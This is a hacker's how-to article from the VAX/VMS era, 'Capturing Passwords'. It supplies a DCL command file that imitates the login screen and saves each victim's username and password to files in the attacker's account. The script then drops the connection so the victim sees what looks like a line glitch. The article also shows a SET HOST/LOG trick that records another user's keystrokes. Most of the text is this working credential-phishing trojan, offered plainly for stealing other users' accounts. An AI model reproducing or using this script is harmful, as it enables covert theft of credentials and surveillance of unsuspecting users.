Capturing Passwords

by Texas Toad

Many times if you are already a user on a VAX/VMS system, it would be handy to have the account names and passwords of other users of the system.

In order to get additional names and passwords, I wrote the DEC Control Language (DCL) command file below which will simulate the normal login screen on a VT100 or compatible terminal, and will write the user's account name and password to a file in your account, and will then abort as if a line glitch had occurred.

The user who enters his name and password should not be suspicious, since the login appears to abort from natural causes.  In the event that he/she is, however, the Ctrl+B+Tab command sequence defined will force an exit from the network or host system before control is passed back to the user.  Note that the Ctrl+B+Tab sequence is system-specific and should be whatever characters are used on your system to disconnect the terminal or process from the host computer.

The files USER.TST and PASS.TST contain the user's login name and password, respectively.

Another handy trick is shown below...

This command creates a file in your account which will subsequently capture all the activity occurring at your terminal.  Any keystrokes, any commands, all the actions done at the keyboard will be logged in the file as well as going on at the terminal as normal.

$ SET HOST/LOG=filename 0

Be sure to include a legal VMS filename and be sure to include the zero following the filename.

Once the user or whoever logs off, system control returns to the account from which the above command was given.  At that point, the filename specified now has the contents of the session.

It may be necessary, if you want to edit the file with EDT or a standard text file editor, to run the following command:

$ MCR REF

This will convert non-ASCII control sequences (like terminal control characters) to spelled-out ASCII codes (like ESC for the Escape key).  The file can then be examined at will.

Interested in more VAX goodies?  Have terminal will travel.

$ SET NOCONTROL_Y $ INQUIRE/NOPUNCTUATION RETURN "2J" # Use if you are connected by a LAN to your VAX. $ TYPE SYS$INPUT (You may now enter Net/One commands.) $ INQUIRE/NOPUNCTUATION GREATER ">" $ TYPE SYS$INPUT connecting...(1) 16169b6 success $ INQUIRE/NOPUNCTUATION NULL "" # Use if you are connected by a LAN to your VAX. $ WRITE SYSA$OUTPUT "2J" $ WRITE SYSA$OUTPUT "10;0H" $ TYPE SYS$INPUT (This is where your particular login message goes.) $ INQUIRE Username "Username" $ SET TERM/NOECHO $ INQUIRE Password "Password" $ OPEN/WRITE OUTFILE PASS.TST $ WRITE OUTFILE Password $ CLOSE OUTFILE $ OPEN/WRITE OUTER USER.TST $ WRITE OUTER USERNAME $ CLOSE OUTER $ TYPE SYS$INPUT User authorization failure $ ! WAIT 00:00:05 $ CTRL_B[0,7] = %00002 $ TAB[0,7] = %00011 $ CTRL_B_TAB = CTRL_B + TAB $ WRITE SYS$OUTPUT CTRL_B_TAB $ EXIT

PASS:TST will contain the password of user.

USER.TST will contain the name of user.